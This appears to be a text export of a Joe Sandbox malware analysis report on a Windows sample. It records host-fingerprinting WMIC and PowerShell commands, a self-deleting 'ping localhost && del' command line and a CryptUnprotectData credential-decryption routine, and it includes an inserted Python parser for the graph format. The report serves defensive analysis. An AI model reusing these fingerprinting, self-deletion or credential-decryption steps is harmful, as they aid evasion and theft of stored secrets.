                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:09:44:26
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:09:44:26
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:21
                                                Start time:09:44:28
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic.exe" csproduct get uuid
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:09:44:28
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:23
                                                Start time:09:44:28
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:24
                                                Start time:09:44:28
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:25
                                                Start time:09:44:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic" path win32_VideoController get name
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:26
                                                Start time:09:44:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:27
                                                Start time:09:44:50
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pause
                                                Imagebase:0x7ff7474c0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:28
                                                Start time:09:44:50
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:29
                                                Start time:09:44:51
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\PING.EXE
                                                Wow64 process (32bit):false
                                                Commandline:ping localhost
                                                Imagebase:0x7ff7ef520000
                                                File size:22'528 bytes
                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:10.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:100%
                                                  Total number of Nodes:4
                                                  Total number of Limit Nodes:0
                                                  Execution graph (rendered graph not reproduced): 4 nodes, 7ffd9ba336ae -> 7ffd9ba336ca -> 7ffd9ba337c7 (CryptUnprotectData) -> 7ffd9ba33843

                                                  Control-flow Graph

                                                  Control-flow graph (rendered graph not reproduced; legend: Executed / Not Executed): basic blocks from 7ffd9ba305f5 to 7ffd9ba30ee3, including two calls to the function at 7ffd9ba30930
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-2852464175
                                                  • Opcode ID: afa6281173bc795f9dd10dfc987e94982a2a963a0a0b022d72ed1ae815d94ca4
                                                  • Instruction ID: 7a193e85a2154ec8867a8c573896e30283e276d9e631609a8be8d991a1e3df53
                                                  • Opcode Fuzzy Hash: afa6281173bc795f9dd10dfc987e94982a2a963a0a0b022d72ed1ae815d94ca4
                                                  • Instruction Fuzzy Hash: 1062E631B0EB894FE766DB289875A787BE1EF56710B0A01FAD449C71F3EE58AC418341

                                                  Control-flow Graph

                                                  Control-flow graph (rendered graph not reproduced; legend: Executed / Not Executed): basic blocks from 7ffd9ba3300d to 7ffd9ba33878; the block at 7ffd9ba337c7 calls CryptUnprotectData
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b95ab447879792919f69fba64b731258ce147bbe4a1e704fb3318be390bb3e25
                                                  • Instruction ID: f826a768c6ea3066398dc1ec21d58761aef9585b4d866b863b7f8db7a46a92f2
                                                  • Opcode Fuzzy Hash: b95ab447879792919f69fba64b731258ce147bbe4a1e704fb3318be390bb3e25
                                                  • Instruction Fuzzy Hash: 10A11A6290FBC51FEB66876858151A57FE1FF96320B0940BFE0C8871B7E5A8AD05C382

                                                  Control-flow Graph

                                                  control_flow_graph 272 7ffd9ba3c391-7ffd9ba3c3b2 275 7ffd9ba3c3b4-7ffd9ba3c3b8 272->275 276 7ffd9ba3c3ba-7ffd9ba3c3d1 272->276 275->276 277 7ffd9ba3c3d3-7ffd9ba3c411 276->277 278 7ffd9ba3c41b-7ffd9ba3c421 276->278 279 7ffd9ba3c424-7ffd9ba3c435 278->279 280 7ffd9ba3c423 278->280 282 7ffd9ba3c438-7ffd9ba3c449 279->282 283 7ffd9ba3c437 279->283 280->279 284 7ffd9ba3c44c-7ffd9ba3c45d 282->284 285 7ffd9ba3c44b 282->285 283->282 286 7ffd9ba3c460-7ffd9ba3c471 284->286 287 7ffd9ba3c45f 284->287 285->284 288 7ffd9ba3c474-7ffd9ba3c485 286->288 289 7ffd9ba3c473 286->289 287->286 290 7ffd9ba3c488-7ffd9ba3c499 288->290 291 7ffd9ba3c487 288->291 289->288 292 7ffd9ba3c49c-7ffd9ba3c4b7 290->292 293 7ffd9ba3c49b 290->293 291->290 294 7ffd9ba3c501-7ffd9ba3c516 292->294 295 7ffd9ba3c4b9-7ffd9ba3c4cf 292->295 293->292 296 7ffd9ba3c4d1-7ffd9ba3c4d4 295->296 297 7ffd9ba3c528-7ffd9ba3c53c 295->297 299 7ffd9ba3c4d6-7ffd9ba3c4dd 296->299 300 7ffd9ba3c555-7ffd9ba3c569 296->300 301 7ffd9ba3c53e-7ffd9ba3c553 297->301 302 7ffd9ba3c586 297->302 299->294 303 7ffd9ba3c5c2-7ffd9ba3c5c7 300->303 304 7ffd9ba3c56b-7ffd9ba3c56e 300->304 301->300 305 7ffd9ba3c5c8-7ffd9ba3c5ea 302->305 306 7ffd9ba3c588-7ffd9ba3c59b 302->306 303->305 307 7ffd9ba3c570-7ffd9ba3c572 304->307 308 7ffd9ba3c5ef-7ffd9ba3c5f3 304->308 311 7ffd9ba3c5ee 305->311 326 7ffd9ba3c5a2-7ffd9ba3c5a3 306->326 307->311 312 7ffd9ba3c574 307->312 314 7ffd9ba3c5f4-7ffd9ba3c5f5 308->314 315 7ffd9ba3c5f6-7ffd9ba3c5f9 308->315 311->308 316 7ffd9ba3c5b6-7ffd9ba3c5ba 312->316 317 7ffd9ba3c576-7ffd9ba3c578 312->317 314->315 319 7ffd9ba3c5fa-7ffd9ba3c5fe 315->319 321 7ffd9ba3c5bc-7ffd9ba3c5c0 316->321 317->314 322 7ffd9ba3c57a 317->322 320 7ffd9ba3c600-7ffd9ba3c605 319->320 323 7ffd9ba3c608-7ffd9ba3c643 320->323 324 7ffd9ba3c607 320->324 321->303 322->321 325 7ffd9ba3c57c-7ffd9ba3c57e 322->325 327 7ffd9ba3c795-7ffd9ba3c7b0 323->327 328 7ffd9ba3c649-7ffd9ba3c68f 323->328 324->323 325->319 329 
7ffd9ba3c580 325->329 330 7ffd9ba3c5aa-7ffd9ba3c5b5 call 7ffd9ba3c5bc 326->330 331 7ffd9ba3c7b7-7ffd9ba3c7ca 327->331 350 7ffd9ba3c696-7ffd9ba3c69d call 7ffd9ba3b280 328->350 329->303 333 7ffd9ba3c582-7ffd9ba3c584 329->333 330->316 335 7ffd9ba3c808-7ffd9ba3c813 331->335 336 7ffd9ba3c7cc-7ffd9ba3c7d5 331->336 333->302 333->320 341 7ffd9ba3c726-7ffd9ba3c746 335->341 342 7ffd9ba3c819-7ffd9ba3c85d 335->342 338 7ffd9ba3c7e7-7ffd9ba3c7fe 336->338 339 7ffd9ba3c7d7-7ffd9ba3c7dd 336->339 338->335 348 7ffd9ba3c800-7ffd9ba3c801 338->348 339->338 341->331 349 7ffd9ba3c748-7ffd9ba3c783 341->349 348->335 355 7ffd9ba3c78c-7ffd9ba3c794 349->355 354 7ffd9ba3c6a2-7ffd9ba3c6e7 350->354 354->355 359 7ffd9ba3c6ed-7ffd9ba3c720 354->359 355->327 359->341 359->342
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ^3_H
                                                  • API String ID: 0-1772057725
                                                  • Opcode ID: 6c596761396f2aba1ad469f45104eb86eb8a8252f93c4131c89210b142dc4399
                                                  • Instruction ID: 5dcc24f229e465677550b90fd14dfa513654d0afa5c866b2fbd2d612b13d7398
                                                  • Opcode Fuzzy Hash: 6c596761396f2aba1ad469f45104eb86eb8a8252f93c4131c89210b142dc4399
                                                  • Instruction Fuzzy Hash: F9025831A0D78E4FDB65DF688C646B67BE1FF85310F0401BAE45DC71D2EA28A902C741

                                                  Control-flow Graph

                                                  control_flow_graph 363 7ffd9b8c20d8-7ffd9b8c361d 365 7ffd9b8c3627-7ffd9b8c3633 363->365 366 7ffd9b8c361f-7ffd9b8c3625 363->366 367 7ffd9b8c3636-7ffd9b8c372c call 7ffd9b8c20d0 call 7ffd9b8c23b0 365->367 366->367 373 7ffd9b8c3732-7ffd9b8c3736 367->373 374 7ffd9b8c3738-7ffd9b8c373a 373->374 375 7ffd9b8c374e-7ffd9b8c3753 373->375 374->375 376 7ffd9b8c373c-7ffd9b8c373f call 7ffd9b8c2140 374->376 377 7ffd9b8c3755-7ffd9b8c3764 call 7ffd9b8c2138 375->377 378 7ffd9b8c3783-7ffd9b8c378a 375->378 385 7ffd9b8c3744-7ffd9b8c374b 376->385 390 7ffd9b8c376a-7ffd9b8c377e 377->390 391 7ffd9b8c3ca4-7ffd9b8c3cb5 377->391 381 7ffd9b8c378c-7ffd9b8c379e call 7ffd9b8c20e0 378->381 382 7ffd9b8c37a3-7ffd9b8c37ab 378->382 381->382 383 7ffd9b8c37ad-7ffd9b8c37b4 382->383 384 7ffd9b8c37e3-7ffd9b8c37e8 382->384 388 7ffd9b8c37c7-7ffd9b8c37ca call 7ffd9b8c2118 383->388 389 7ffd9b8c37b6-7ffd9b8c37c0 call 7ffd9b8c20f0 383->389 392 7ffd9b8c38d6-7ffd9b8c38e0 call 7ffd9b8c23f8 384->392 393 7ffd9b8c37ee-7ffd9b8c3819 384->393 385->375 401 7ffd9b8c37cf-7ffd9b8c37d1 388->401 389->384 407 7ffd9b8c37c2 389->407 390->378 396 7ffd9b8c3cc7-7ffd9b8c3cd8 391->396 397 7ffd9b8c3cb7-7ffd9b8c3cc2 call 7ffd9b8c20e0 391->397 392->373 409 7ffd9b8c38e6-7ffd9b8c38f0 call 7ffd9b8c2148 392->409 393->392 399 7ffd9b8c381f-7ffd9b8c3826 393->399 397->396 405 7ffd9b8c38cc-7ffd9b8c38d1 399->405 406 7ffd9b8c382c-7ffd9b8c3837 399->406 401->384 408 7ffd9b8c37d3-7ffd9b8c37dd call 7ffd9b8c2120 401->408 405->373 410 7ffd9b8c3839-7ffd9b8c384a 406->410 411 7ffd9b8c3850-7ffd9b8c3887 406->411 407->373 408->373 408->384 419 7ffd9b8c3900-7ffd9b8c390d 409->419 420 7ffd9b8c38f2-7ffd9b8c38fb 409->420 410->405 410->411 415 7ffd9b8c3889-7ffd9b8c388d 411->415 416 7ffd9b8c3893-7ffd9b8c38c1 411->416 415->416 416->405 421 7ffd9b8c3940-7ffd9b8c3942 419->421 422 7ffd9b8c390f-7ffd9b8c3916 419->422 420->373 426 7ffd9b8c394b 421->426 427 7ffd9b8c3944-7ffd9b8c3949 421->427 424 7ffd9b8c3918-7ffd9b8c3924 
422->424 425 7ffd9b8c3926-7ffd9b8c3937 call 7ffd9b8c1150 422->425 424->425 428 7ffd9b8c3939-7ffd9b8c393b 424->428 425->421 425->428 431 7ffd9b8c394d-7ffd9b8c3955 426->431 427->431 428->373 433 7ffd9b8c3997-7ffd9b8c399a call 7ffd9b8c2150 431->433 434 7ffd9b8c3957-7ffd9b8c395e 431->434 438 7ffd9b8c399f-7ffd9b8c39a1 433->438 436 7ffd9b8c3960-7ffd9b8c396c 434->436 437 7ffd9b8c396e-7ffd9b8c397f call 7ffd9b8c1150 434->437 436->437 439 7ffd9b8c3990-7ffd9b8c3992 436->439 437->439 444 7ffd9b8c3981-7ffd9b8c398e call 7ffd9b8c1150 437->444 442 7ffd9b8c39ad-7ffd9b8c39af 438->442 443 7ffd9b8c39a3-7ffd9b8c39a8 438->443 439->373 445 7ffd9b8c39b5-7ffd9b8c39cf 442->445 446 7ffd9b8c3a3a-7ffd9b8c3a3e 442->446 443->373 444->433 444->439 450 7ffd9b8c39e3-7ffd9b8c39f0 445->450 451 7ffd9b8c39d1-7ffd9b8c39dd 445->451 448 7ffd9b8c3ac5-7ffd9b8c3ad0 446->448 449 7ffd9b8c3a44-7ffd9b8c3a5a 446->449 462 7ffd9b8c3c9d-7ffd9b8c3c9f 448->462 454 7ffd9b8c3a5c-7ffd9b8c3a68 449->454 455 7ffd9b8c3a6e-7ffd9b8c3a7b 449->455 456 7ffd9b8c39f2-7ffd9b8c39fd 450->456 457 7ffd9b8c3a31-7ffd9b8c3a38 450->457 451->450 454->455 459 7ffd9b8c3abc-7ffd9b8c3ac3 455->459 460 7ffd9b8c3a7d-7ffd9b8c3a88 455->460 458 7ffd9b8c3a03-7ffd9b8c3a2c 456->458 457->458 458->462 461 7ffd9b8c3a8e-7ffd9b8c3ab7 459->461 460->461 461->462 462->373
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: J_H
                                                  • API String ID: 0-326533465
                                                  • Opcode ID: 7c619d2275a4f8925c90b1cd1a7195a548c1b9607d28266559b899aea3eb538c
                                                  • Instruction ID: 4b96e56bfc4f489b9fc11423591c10edafa4d1a9ef7c29e33c8714305f45bb35
                                                  • Opcode Fuzzy Hash: 7c619d2275a4f8925c90b1cd1a7195a548c1b9607d28266559b899aea3eb538c
                                                  • Instruction Fuzzy Hash: FC022E70A19A498FEBA8EB58C4A5BB5B3E1FF58300F11417AD44EC32A1DE35F946CB41

                                                  Control-flow Graph

                                                  control_flow_graph 469 7ffd9ba336ae-7ffd9ba33769 call 7ffd9ba325d0 483 7ffd9ba3376b 469->483 484 7ffd9ba3376c-7ffd9ba3377d 469->484 483->484 485 7ffd9ba3377f 484->485 486 7ffd9ba33780-7ffd9ba33841 CryptUnprotectData 484->486 485->486 488 7ffd9ba33843 486->488 489 7ffd9ba33849-7ffd9ba33878 486->489 488->489
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID: CryptDataUnprotect
                                                  • String ID:
                                                  • API String ID: 834300711-0
                                                  • Opcode ID: 3bd393ce48701cf141ae6f210bf9463ab1405fa8f0b53dcb4fe4d7008eb2c901
                                                  • Instruction ID: d2036f10a63c2cab7e638c5e2fa400f9f801a6ce72b82ac237f8a0a3923c4b5b
                                                  • Opcode Fuzzy Hash: 3bd393ce48701cf141ae6f210bf9463ab1405fa8f0b53dcb4fe4d7008eb2c901
                                                  • Instruction Fuzzy Hash: D8512970A1CB8D4FDB59EB6C9815AB97BE0FF59310F0041BEE44DC3293DA64A8458782
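The control_flow_graph line above is the text form of the interactive graph: each `<id> <start>-<end>` token pair is a basic block (a single address is a one-instruction block), `call <addr>` marks a call to another function in the same dump, a bare identifier such as CryptUnprotectData marks a resolved import inside that block, and `<a>-><b>` is an edge. The parser below is added here as a worked example of reading that format; it is not part of Joe Sandbox or its IDA plugin and assumes only the token grammar visible on this page. Its sample input is the edge list of the record above, copied verbatim, and it reports the block and edge counts, the entry and exit blocks, and the shortest block path from the entry to the DPAPI call.

```python
"""Parse a Joe Sandbox IDA-plugin control_flow_graph edge list into blocks and
edges, then locate the API calls in it.  Added example, not plugin code.

Assumed grammar (from the records on this page):
    <node-id> <start>[-<end>] [call <target>]... [<ApiName>]...   block
    <from>-><to>                                                  edge
"""
import re
from collections import deque
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$", re.I)

# Sample input: the edge list of the CryptUnprotectData record above.
SAMPLE_EDGE_LIST = (
    "control_flow_graph 469 7ffd9ba336ae-7ffd9ba33769 call 7ffd9ba325d0 "
    "483 7ffd9ba3376b 469->483 484 7ffd9ba3376c-7ffd9ba3377d 469->484 "
    "483->484 485 7ffd9ba3377f 484->485 486 7ffd9ba33780-7ffd9ba33841 "
    "CryptUnprotectData 484->486 485->486 488 7ffd9ba33843 486->488 "
    "489 7ffd9ba33849-7ffd9ba33878 486->489 488->489"
)


@dataclass
class Block:
    node: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # internal call targets
    apis: list = field(default_factory=list)   # imported API names


@dataclass
class CFG:
    blocks: dict
    edges: list


def parse_cfg(text: str) -> CFG:
    # Whitespace tokenisation, so a list wrapped across lines still parses.
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif NODE_RE.match(tok):
            # A node id is always followed by its address or address range.
            am = ADDR_RE.match(tokens[i + 1]) if i + 1 < len(tokens) else None
            if am is None:
                raise ValueError(f"node {tok} has no address")
            start = int(am.group(1), 16)
            end = int(am.group(2), 16) if am.group(2) else start
            current = Block(int(tok), start, end)
            blocks[current.node] = current
            i += 2
        elif tok == "call":
            if current is None or i + 1 >= len(tokens):
                raise ValueError("dangling call annotation")
            current.calls.append(int(tokens[i + 1], 16))
            i += 2
        else:
            # Any other bare token is an import the plugin resolved.
            if current is None:
                raise ValueError(f"API name {tok!r} before any block")
            current.apis.append(tok)
            i += 1
    return CFG(blocks, edges)


def blocks_calling(cfg: CFG, api: str) -> list:
    return sorted(n for n, b in cfg.blocks.items() if api in b.apis)


def summarize(cfg: CFG) -> dict:
    indeg = {n: 0 for n in cfg.blocks}
    outdeg = {n: 0 for n in cfg.blocks}
    for a, b in cfg.edges:
        outdeg[a] += 1
        indeg[b] += 1
    return {
        "blocks": len(cfg.blocks),
        "edges": len(cfg.edges),
        "range": (min(b.start for b in cfg.blocks.values()),
                  max(b.end for b in cfg.blocks.values())),
        "entry": sorted(n for n, d in indeg.items() if d == 0),
        "exits": sorted(n for n, d in outdeg.items() if d == 0),
        "apis": sorted({a for b in cfg.blocks.values() for a in b.apis}),
        "calls": sorted({c for b in cfg.blocks.values() for c in b.calls}),
    }


def path_to_api(cfg: CFG, api: str) -> list:
    """Shortest block path (BFS) from the entry block to the first block
    that invokes `api`; empty list if there is no such path."""
    targets = set(blocks_calling(cfg, api))
    entry = summarize(cfg)["entry"]
    if not entry or not targets:
        return []
    succ = {}
    for a, b in cfg.edges:
        succ.setdefault(a, []).append(b)
    prev, queue = {entry[0]: None}, deque([entry[0]])
    while queue:
        n = queue.popleft()
        if n in targets:
            path = []
            while n is not None:
                path.append(n)
                n = prev[n]
            return path[::-1]
        for s in succ.get(n, []):
            if s not in prev:
                prev[s] = n
                queue.append(s)
    return []


if __name__ == "__main__":
    g = parse_cfg(SAMPLE_EDGE_LIST)
    print(summarize(g))
    print("path to CryptUnprotectData:", path_to_api(g, "CryptUnprotectData"))
```

The same parser accepts the longer edge lists elsewhere on this page, including those that the text export wrapped across two lines, because it splits on whitespace rather than on line breaks. The executed / not-executed colouring of the interactive graph is not present in the text, so reachability here is static, not a record of what ran in the sandbox.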
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cef56485e167d56f357caec004e8db1d1fc2399f04bfa3d5491c184a59fae34
                                                  • Instruction ID: 77176bd1f71ba8e8d070721b9e8953220cc8172c73d45128c5f64379d25fd82a
                                                  • Opcode Fuzzy Hash: 5cef56485e167d56f357caec004e8db1d1fc2399f04bfa3d5491c184a59fae34
                                                  • Instruction Fuzzy Hash: FBB20771E0E38A4FE73D9B5884626E97BE0EF45304F05467ED48EC72B2DE74650A8782
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c8fc0e912fe6f4a384afd84e1395bc765e2c4030d87fdeabc0926072797fe06
                                                  • Instruction ID: d51f4f2c3ad0dcd4f034b4994322e1025bc2aa315aef1b328c098a8ee1859fde
                                                  • Opcode Fuzzy Hash: 4c8fc0e912fe6f4a384afd84e1395bc765e2c4030d87fdeabc0926072797fe06
                                                  • Instruction Fuzzy Hash: 96329071718A0A4FDBACEB18D4A1A75B3E1FFA8300B1545AED04EC3696DE35F942C781
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68911c07542bbf7b8dff6fce8e0d38f67d2dfb3b47589fb3bb4fe47794c9c4ef
                                                  • Instruction ID: d95df80b9875b6246d8a15b59c62e9a95b027b2fdd810bdb8d9de6a746d9e6c8
                                                  • Opcode Fuzzy Hash: 68911c07542bbf7b8dff6fce8e0d38f67d2dfb3b47589fb3bb4fe47794c9c4ef
                                                  • Instruction Fuzzy Hash: 4D126821B0EA4E0FE7B4EB78846567977D2EF49310F0501BDD48EC72E3DEA8A8468341
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c14ccfaefdf3850c334bf2179d1ca831c3b43aa9a9b6972970c9d40b2a66c1c
                                                  • Instruction ID: d30baa73b96cc375cfd53ed971c261b46f7263d6c5c6ebcd1fcbe691eb2eb3be
                                                  • Opcode Fuzzy Hash: 9c14ccfaefdf3850c334bf2179d1ca831c3b43aa9a9b6972970c9d40b2a66c1c
                                                  • Instruction Fuzzy Hash: AEF16930A09A4E8FE7A8EF6888646F97BE1FF59310F1502BDD05DC71E6CD69A906C740
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d15500e3434b4ac02df3099283bc3a8c9e510d880be8d98e8ce43f92cf024ad
                                                  • Instruction ID: fe0a3c4bb73bb332848cb3c73c734e113328d844a7471a5ca8b44337cda2456a
                                                  • Opcode Fuzzy Hash: 4d15500e3434b4ac02df3099283bc3a8c9e510d880be8d98e8ce43f92cf024ad
                                                  • Instruction Fuzzy Hash: 61A11571B0DA194BEB6CAB6CA8656B977C1EF99310F04017EE44EC32E3DD25A8428785
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21434d9f2348378e216ea491c0f03d8b7969ebf26ce18ad75ea4a95462fdf547
                                                  • Instruction ID: 8b44f1db8d5291c517c70f14ae4892b7fa8876adb4815cbb3d16dcbdc3bd6098
                                                  • Opcode Fuzzy Hash: 21434d9f2348378e216ea491c0f03d8b7969ebf26ce18ad75ea4a95462fdf547
                                                  • Instruction Fuzzy Hash: 3FB1473550E6CD4FD7629B749C206E67FA4EF47324F0501BBE098C70E3E9691A1AC7A2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
